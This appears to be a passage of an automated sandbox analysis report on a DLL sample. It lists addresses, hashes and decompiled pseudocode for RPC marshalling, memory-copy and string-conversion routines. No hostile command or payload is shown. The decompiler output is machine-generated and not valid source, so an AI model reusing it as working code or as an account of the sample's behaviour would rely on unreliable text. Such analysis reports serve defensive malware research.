                                                                                              0x6f70db17
                                                                                              0x6f70db19
                                                                                              0x6f70db1c
                                                                                              0x6f70db1f
                                                                                              0x6f70db22
                                                                                              0x6f70db25
                                                                                              0x6f70db27
                                                                                              0x6f70db2a
                                                                                              0x6f70db2d
                                                                                              0x6f70db2e
                                                                                              0x6f70db31
                                                                                              0x6f70db34
                                                                                              0x6f70db35
                                                                                              0x6f70db3a
                                                                                              0x6f70db3f
                                                                                              0x6f70db42
                                                                                              0x6f70db47
                                                                                              0x6f70db47
                                                                                              0x6f70db25
                                                                                              0x6f70db4d
                                                                                              0x6f70db50
                                                                                              0x6f70db54
                                                                                              0x6f70db56
                                                                                              0x6f70db59
                                                                                              0x6f70db5c
                                                                                              0x6f70db5d
                                                                                              0x6f70db62
                                                                                              0x6f70db67
                                                                                              0x6f70db6a
                                                                                              0x6f70db6f
                                                                                              0x6f70db6f
                                                                                              0x6f70db75
                                                                                              0x6f70db78
                                                                                              0x6f70db7c
                                                                                              0x6f70db89
                                                                                              0x6f70db8c
                                                                                              0x6f70db8f
                                                                                              0x6f70db93
                                                                                              0x6f70dba0
                                                                                              0x6f70dba3
                                                                                              0x6f70dba8
                                                                                              0x6f70dbb0
                                                                                              0x6f70dbb8
                                                                                              0x6f70dbbc
                                                                                              0x6f70dbbe
                                                                                              0x6f70dcac
                                                                                              0x6f70dcac
                                                                                              0x00000000
                                                                                              0x6f70dbc4
                                                                                              0x6f70dbc4
                                                                                              0x6f70dbc8
                                                                                              0x6f70dbca
                                                                                              0x6f70dbe1
                                                                                              0x6f70dbe5
                                                                                              0x6f70dbe7
                                                                                              0x6f70dc17
                                                                                              0x6f70dc17
                                                                                              0x6f70dc1a
                                                                                              0x6f70dc1d
                                                                                              0x6f70dc1f
                                                                                              0x6f70dc22
                                                                                              0x6f70dc23
                                                                                              0x6f70dc26
                                                                                              0x6f70dc27
                                                                                              0x6f70dc2d
                                                                                              0x6f70dc30
                                                                                              0x6f70dc30
                                                                                              0x6f70dc32
                                                                                              0x6f70dc32
                                                                                              0x6f70dc35
                                                                                              0x6f70dc38
                                                                                              0x6f70dc3a
                                                                                              0x6f70dc3d
                                                                                              0x6f70dc51
                                                                                              0x6f70dc55
                                                                                              0x6f70dc58
                                                                                              0x6f70dc5b
                                                                                              0x6f70dc5f
                                                                                              0x6f70dc3f
                                                                                              0x6f70dc3f
                                                                                              0x6f70dc47
                                                                                              0x6f70dc4c
                                                                                              0x6f70dc67
                                                                                              0x6f70dc6a
                                                                                              0x6f70dc6d
                                                                                              0x6f70dc70
                                                                                              0x6f70dc90
                                                                                              0x6f70dc93
                                                                                              0x6f70dc95
                                                                                              0x6f70dc96
                                                                                              0x6f70dc9b
                                                                                              0x6f70dc9e
                                                                                              0x6f70dc9f
                                                                                              0x6f70dca4
                                                                                              0x6f70dca9
                                                                                              0x6f70dc72
                                                                                              0x6f70dc72
                                                                                              0x6f70dc75
                                                                                              0x6f70dc77
                                                                                              0x6f70dc78
                                                                                              0x6f70dc7d
                                                                                              0x6f70dc80
                                                                                              0x6f70dc81
                                                                                              0x6f70dc86
                                                                                              0x6f70dc8b
                                                                                              0x6f70dc8b
                                                                                              0x00000000
                                                                                              0x6f70dc70
                                                                                              0x6f70dbe9
                                                                                              0x6f70dbec
                                                                                              0x6f70dbf0
                                                                                              0x6f70dbf2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70dbf4
                                                                                              0x6f70dbf7
                                                                                              0x6f70dbfa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70dbfc
                                                                                              0x6f70dbff
                                                                                              0x6f70dc02
                                                                                              0x6f70dc05
                                                                                              0x6f70dc08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70dc0a
                                                                                              0x6f70dc0d
                                                                                              0x6f70dc10
                                                                                              0x6f70dc13
                                                                                              0x00000000
                                                                                              0x6f70dc13
                                                                                              0x6f70dbcc
                                                                                              0x6f70dbcf
                                                                                              0x6f70dbd0
                                                                                              0x6f70dbd3
                                                                                              0x6f70dbd4
                                                                                              0x6f70dbda
                                                                                              0x6f70dbdd
                                                                                              0x00000000
                                                                                              0x6f70dbdd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: copying %p to %p$unknown array format 0x%x
                                                                                              • API String ID: 4104443479-2029649059
                                                                                              • Opcode ID: ff4a0c06aecee70f3f3517ce785335d542ab50072c5d61e8c2c6a6bc339f7ee7
                                                                                              • Instruction ID: 030d5e8189ccbcf8b2e8038d05273404ccb4315fa12295891aaee1f16c7357e8
                                                                                              • Opcode Fuzzy Hash: ff4a0c06aecee70f3f3517ce785335d542ab50072c5d61e8c2c6a6bc339f7ee7
                                                                                              • Instruction Fuzzy Hash: 81A15EF9A04249AFCB04DFA8D990DAE7BF6BF89304F148059F9149B341D735EA11CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F703AA0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E6F703AA0(signed int _a4, intOrPtr* _a8, signed short* _a12, signed int _a16) {
				signed char* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t116;
				char _t125;
				intOrPtr _t137;
				intOrPtr _t140;
				void* _t152;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t221;

				_v12 = _a12[1] & 0x0000ffff;
				_v8 = 0;
				_v24 = 0;
				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v36 = 0;
				_v16 = 0;
				0x6f700000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t219 = _t218 + 0x14;
				_t116 = _a4;
				_t223 =  *((intOrPtr*)(_t116 + 0x34));
				if( *((intOrPtr*)(_t116 + 0x34)) == 0) {
					_v48 =  *((intOrPtr*)(_a4 + 0x30));
					_v20 =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6F705F90(_t223, _a4, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v48;
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
					0x6f700000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) - _v20);
					_t219 = _t219 + 8;
					_v44 = 1;
					 *((intOrPtr*)(_a4 + 4)) = _v20;
				}
				E6F7073D0(( *(_a12 + (1 << 0)) & 0x000000ff) + 1, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t220 = _t219 + 8;
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v24 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				if(_v8 != 0) {
					_t140 = E6F70D650( *_v8 & 0x000000ff, _a4, _v8);
					_t220 = _t220 + 0xc;
					_v16 = _t140;
					_v12 = _v12 + _v16;
					_v28 =  *((intOrPtr*)(_a4 + 0x3c));
					_v32 =  *((intOrPtr*)(_a4 + 0x44));
					_v36 =  *((intOrPtr*)(_a4 + 0x40));
				}
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					_t137 = E6F70A3B0(_a4, _a4, _v12);
					_t220 = _t220 + 8;
					 *_a8 = _t137;
				}
				_t125 = E6F709560(_a4,  *_a8, _a12, _v24, _a16 & 0x000000ff);
				_t221 = _t220 + 0x14;
				_v40 = _t125;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v28;
					 *((intOrPtr*)(_a4 + 0x44)) = _v32;
					 *((intOrPtr*)(_a4 + 0x40)) = _v36;
					if((_a16 & 0x000000ff) != 0) {
						E6F710730(_v40, 0, _v16);
						_t221 = _t221 + 0xc;
					}
					E6F70D830(_t152, _t216, _t217,  *_v8 & 0x000000ff, _a4,  &_v40, _v8, 0, 0, 1);
				}
				if(_v44 != 0) {
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
					 *((intOrPtr*)(_a4 + 0x34)) = 0;
				}
				return 0;
			}

























                                                                                              0x6f703aad
                                                                                              0x6f703ab0
                                                                                              0x6f703ab7
                                                                                              0x6f703abe
                                                                                              0x6f703ac5
                                                                                              0x6f703acc
                                                                                              0x6f703ad3
                                                                                              0x6f703ada
                                                                                              0x6f703af7
                                                                                              0x6f703afc
                                                                                              0x6f703aff
                                                                                              0x6f703b02
                                                                                              0x6f703b06
                                                                                              0x6f703b0e
                                                                                              0x6f703b17
                                                                                              0x6f703b1d
                                                                                              0x6f703b2c
                                                                                              0x6f703b37
                                                                                              0x6f703b43
                                                                                              0x6f703b55
                                                                                              0x6f703b5a
                                                                                              0x6f703b5d
                                                                                              0x6f703b6a
                                                                                              0x6f703b6a
                                                                                              0x6f703b87
                                                                                              0x6f703b8c
                                                                                              0x6f703b95
                                                                                              0x6f703ba0
                                                                                              0x6f703bab
                                                                                              0x6f703bab
                                                                                              0x6f703bb4
                                                                                              0x6f703bbf
                                                                                              0x6f703bca
                                                                                              0x6f703bca
                                                                                              0x6f703bd3
                                                                                              0x6f703bda
                                                                                              0x6f703bf4
                                                                                              0x6f703bf9
                                                                                              0x6f703bfc
                                                                                              0x6f703c05
                                                                                              0x6f703c0e
                                                                                              0x6f703c17
                                                                                              0x6f703c20
                                                                                              0x6f703c20
                                                                                              0x6f703c29
                                                                                              0x6f703c33
                                                                                              0x6f703c33
                                                                                              0x6f703c3d
                                                                                              0x6f703c47
                                                                                              0x6f703c4c
                                                                                              0x6f703c52
                                                                                              0x6f703c52
                                                                                              0x6f703c6b
                                                                                              0x6f703c70
                                                                                              0x6f703c73
                                                                                              0x6f703c7a
                                                                                              0x6f703c82
                                                                                              0x6f703c8b
                                                                                              0x6f703c94
                                                                                              0x6f703c9d
                                                                                              0x6f703ca9
                                                                                              0x6f703cae
                                                                                              0x6f703cae
                                                                                              0x6f703cd3
                                                                                              0x6f703cd8
                                                                                              0x6f703cdf
                                                                                              0x6f703cea
                                                                                              0x6f703cf0
                                                                                              0x6f703cf0
                                                                                              0x6f703cfc

                                                                                              APIs
                                                                                              • _NdrComplexStructMemorySize@8.RGSBZEOG(?,?), ref: 6F703B2C
                                                                                              • _memset.LIBCMT ref: 6F703CA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ComplexMemorySize@8Struct_memset
                                                                                              • String ID: (%p,%p,%p,%d)$difference = 0x%x
                                                                                              • API String ID: 4515687-1755659387
                                                                                              • Opcode ID: 717bf0c3680a446106666c7732d726c84d6ee8a94a07bae5879ede0874155b0f
                                                                                              • Instruction ID: 62f100c826b347f3a03f6376c4a59e6514e054f5d810d0c25c969659bf836167
                                                                                              • Opcode Fuzzy Hash: 717bf0c3680a446106666c7732d726c84d6ee8a94a07bae5879ede0874155b0f
                                                                                              • Instruction Fuzzy Hash: 979104B4A00249AFDB44CF58C990BEEBBF5BF88304F148159F8599B381D775EA51CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F70863F, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F708794
                                                                                              Strings
                                                                                              • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6F708713
                                                                                              • invalid format type %x, xrefs: 6F708732
                                                                                              • flags: 0x%02x, xrefs: 6F70875A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ClientContextMarshall@12
                                                                                              • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                              • API String ID: 935922980-1391298755
                                                                                              • Opcode ID: 408728c1b847ce2931d29850ea94b4cda2c2a695167b5edfc416e997a64a53fc
                                                                                              • Instruction ID: 485805f106630c86625dc32dc1b84c934bee220733b47bc22c7cc9a565de5277
                                                                                              • Opcode Fuzzy Hash: 408728c1b847ce2931d29850ea94b4cda2c2a695167b5edfc416e997a64a53fc
                                                                                              • Instruction Fuzzy Hash: 9911E6F12082945BD704DF65DD60FAA7BE5FF8A310F0491A9FCA48B289D535E520C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F703D00, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 44%
                                                                                              			E6F703D00(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				signed int _v12;
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _t81;
				void* _t125;
				void* _t126;
				void* _t127;

				_v8 = _a12;
				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t126 = _t125 + 0x14;
				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
					E6F7073D0(_a4 + 4, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					_t127 = _t126 + 8;
					if(( *_v8 & 0x000000ff) != 0x1d) {
						_v20 = _a12;
						_v12 =  *((intOrPtr*)(_v20 + 2));
						_a12 = _v20 + 6;
					} else {
						_v12 = _v8[2] & 0x0000ffff;
						_a12 =  &(_v8[4]);
					}
					if((_a16 & 0x000000ff) == 0) {
						if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
							 *_a8 =  *((intOrPtr*)(_a4 + 4));
						}
					} else {
						_t81 = E6F70A3B0(_a4, _a4, _v12);
						_t127 = _t127 + 8;
						 *_a8 = _t81;
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v16 =  *((intOrPtr*)(_a4 + 0x10));
					E6F70AF00(_a4, _v12);
					_a12 = E6F70C2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
					0x6f700000("copying %p to %p\n", _v16,  *_a8);
					if( *_a8 != _v16) {
						E6F7100E0( *_a8, _v16, _v12);
					}
					return 0;
				} else {
					0x6f700000("invalid format type %x\n",  *_v8 & 0x000000ff);
					 *0x6f700000(0x6e6);
					return 0;
				}
			}











                                                                                              0x6f703d09
                                                                                              0x6f703d22
                                                                                              0x6f703d27
                                                                                              0x6f703d33
                                                                                              0x6f703d78
                                                                                              0x6f703d7d
                                                                                              0x6f703d89
                                                                                              0x6f703da3
                                                                                              0x6f703dac
                                                                                              0x6f703db5
                                                                                              0x6f703d8b
                                                                                              0x6f703d92
                                                                                              0x6f703d9b
                                                                                              0x6f703d9b
                                                                                              0x6f703dbe
                                                                                              0x6f703de0
                                                                                              0x6f703df3
                                                                                              0x6f703df3
                                                                                              0x6f703dc0
                                                                                              0x6f703dc8
                                                                                              0x6f703dcd
                                                                                              0x6f703dd3
                                                                                              0x6f703dd3
                                                                                              0x6f703dfe
                                                                                              0x6f703e07
                                                                                              0x6f703e12
                                                                                              0x6f703e39
                                                                                              0x6f703e4b
                                                                                              0x6f703e5b
                                                                                              0x6f703e6b
                                                                                              0x6f703e70
                                                                                              0x00000000
                                                                                              0x6f703d40
                                                                                              0x6f703d4c
                                                                                              0x6f703d59
                                                                                              0x00000000
                                                                                              0x6f703d5f

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x
                                                                                              • API String ID: 4104443479-4001265739
                                                                                              • Opcode ID: 6db85a129be4ed8789ca06792395ff35bf4d3715385b2ef75ac76817000af2e0
                                                                                              • Instruction ID: 1fb9ac14fc6969857bdb0767aa0168c8840d62378659fbb0f8c27ab3a8e4f3da
                                                                                              • Opcode Fuzzy Hash: 6db85a129be4ed8789ca06792395ff35bf4d3715385b2ef75ac76817000af2e0
                                                                                              • Instruction Fuzzy Hash: 77514EB5A04248AFCB44DF98D991DAEBBF5BF89304F148199F8199B345D730EA50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F7041B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 28%
                                                                                              			E6F7041B0(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t71;
				void* _t99;
				void* _t100;

				_v12 = 0;
				0x6f700000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				if(( *_a12 & 0x000000ff) == 0x21) {
					_v16 =  *((intOrPtr*)(_a4 + 0x30));
					_v8 =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					 *((intOrPtr*)(_a4 + 0x18)) = 0;
					E6F706490(_a4, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v16;
					0x6f700000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 4)) - _v8);
					if( *((intOrPtr*)(_a4 + 0x34)) == 0) {
						 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
						_v12 = 1;
					}
					 *((intOrPtr*)(_a4 + 4)) = _v8;
					E6F70D650(0x21, _a4, _a12);
					E6F70D830(_t71, _t99, _t100, 0x21, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
					if(_v12 != 0) {
						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
						 *((intOrPtr*)(_a4 + 0x34)) = 0;
					}
					return 0;
				}
				0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
				 *0x6f700000(0x6e6);
				return 0;
			}









                                                                                              0x6f7041b6
                                                                                              0x6f7041d3
                                                                                              0x6f7041ed
                                                                                              0x6f704224
                                                                                              0x6f70422d
                                                                                              0x6f704233
                                                                                              0x6f70423d
                                                                                              0x6f70424c
                                                                                              0x6f704257
                                                                                              0x6f704269
                                                                                              0x6f704278
                                                                                              0x6f704283
                                                                                              0x6f704286
                                                                                              0x6f704286
                                                                                              0x6f704293
                                                                                              0x6f7042a0
                                                                                              0x6f7042bf
                                                                                              0x6f7042cb
                                                                                              0x6f7042d6
                                                                                              0x6f7042dc
                                                                                              0x6f7042dc
                                                                                              0x00000000
                                                                                              0x6f7042e3
                                                                                              0x6f704204
                                                                                              0x6f704211
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _NdrComplexArrayMemorySize@8.RGSBZEOG(?,?), ref: 6F70424C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ArrayComplexMemorySize@8
                                                                                              • String ID: (%p,%p,%p,%d)$difference = 0x%x$invalid format type %x
                                                                                              • API String ID: 2085160478-2050479018
                                                                                              • Opcode ID: 8ba760bc1cd11247618bcda75f68b3555424df93958307ae4756a2455b838d5c
                                                                                              • Instruction ID: 087083a3dde1cc1e811e8e97adc71b35905632adf6cc7c3d9241fc6110ffe7fb
                                                                                              • Opcode Fuzzy Hash: 8ba760bc1cd11247618bcda75f68b3555424df93958307ae4756a2455b838d5c
                                                                                              • Instruction Fuzzy Hash: 6F41F9B5A00209AFDB04DF94C994BAA7BF5BF88314F14C159FD488B385D771EA91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F70D120, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 178COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                              • API String ID: 0-3150054447
                                                                                              • Opcode ID: 20a32340d27ef70aec29bdc31a5178a57be6684c38a4df3f8e54f3c00dda9d6d
                                                                                              • Instruction ID: 3e31d7eabaf74f3ba078f16b4f70ccbbcb7d197f93d3bb9fd88cc624a6b2a955
                                                                                              • Opcode Fuzzy Hash: 20a32340d27ef70aec29bdc31a5178a57be6684c38a4df3f8e54f3c00dda9d6d
                                                                                              • Instruction Fuzzy Hash: D3617EF5900209AFDB04DFA8DA81AAF77B5BF48318F04815DF9199B341E631EA10CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F70CC40, Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 175COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                              • API String ID: 0-3150054447
                                                                                              • Opcode ID: b48d11ad09300df79ef16047d4a58543d4dbe009ccd15e3cf18fa5bbcf322b0e
                                                                                              • Instruction ID: 5d6d98bc21181fc678a9c50591cb7cac403f806b97c66bcf65608ecf222c71bf
                                                                                              • Opcode Fuzzy Hash: b48d11ad09300df79ef16047d4a58543d4dbe009ccd15e3cf18fa5bbcf322b0e
                                                                                              • Instruction Fuzzy Hash: CE6162F5A00209AFDB04DF68DA80AAF77F5BF48219F048559FD19AB341D631EA10CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F717336, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F717336(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E6F711DE3( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E6F71717C( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E6F712A54(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                                                                              0x6f71733e
                                                                                              0x6f717343
                                                                                              0x6f71735d
                                                                                              0x00000000
                                                                                              0x6f71735d
                                                                                              0x6f717345
                                                                                              0x6f71734a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f71734f
                                                                                              0x6f71736c
                                                                                              0x6f717371
                                                                                              0x6f717374
                                                                                              0x6f71737b
                                                                                              0x6f71739a
                                                                                              0x6f7173a1
                                                                                              0x6f7173a3
                                                                                              0x6f7173e7
                                                                                              0x6f7173f6
                                                                                              0x6f717404
                                                                                              0x6f717406
                                                                                              0x6f717416
                                                                                              0x6f717416
                                                                                              0x6f71741a
                                                                                              0x6f71741c
